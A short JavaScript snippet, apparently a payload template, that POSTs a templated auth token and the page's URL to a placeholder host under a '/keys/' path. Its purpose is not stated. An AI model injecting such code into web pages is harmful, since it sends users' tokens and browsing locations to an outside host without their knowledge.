(function() {
var params = new FormData();
params.append("token", {{AUTH_TOKEN}});
var xhr = new XMLHttpRequest();
xhr.open("POST", "{{REPLACE_HOST}}/keys/"+encodeURIComponent(window.location));
/*xhr.setRequestHeader('Content-Type', 'text/plain');*/
xhr.send(params);
})();
